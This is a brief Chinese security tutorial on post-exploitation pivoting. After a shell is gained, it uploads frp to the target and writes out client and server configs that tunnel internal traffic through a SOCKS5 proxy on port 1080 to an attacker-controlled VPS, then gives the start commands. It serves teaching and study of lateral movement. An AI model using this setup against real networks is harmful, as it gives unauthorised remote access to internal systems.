通常我们拿到shell之后扫内网之后,要进行目标机器的服务进行访问 的,这就需要把内网的流量代理到外网出来,也就是常说的内网穿透
2.概况
上传 目标机 frpc.exe 、frpc.ini
修改目标机frpc.ini 内容
[common]
server_addr = vps_ip #自己填攻击机的ip
server_port = 7000
# 客户端认证 token,需要和服务端 token 保持一致
token = frp1234
# 启用加密,防止流量被拦截
use_encryption = true
# 启用压缩,提升流量转发速度
use_compression = true
[socks5]
type = tcp
# 连接 vps 的端口
remote_port = 1080
plugin = socks5
目标机启动服务
frpc.exe -c frpc.ini
攻击机配置:
[common]
server_addr = vps_ip
server_port = 4444
# 客户端认证 token,需要和服务端 token 保持一致
token = frp1234
攻击机开启服务 :
./frps -c frps.ini
注:代理服务器为vps的ip 端口为目标机器的socks代理端口也就是1080
原文始发于微信公众号(韭要学JAVA安全):内网渗透之流量代理(frp)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论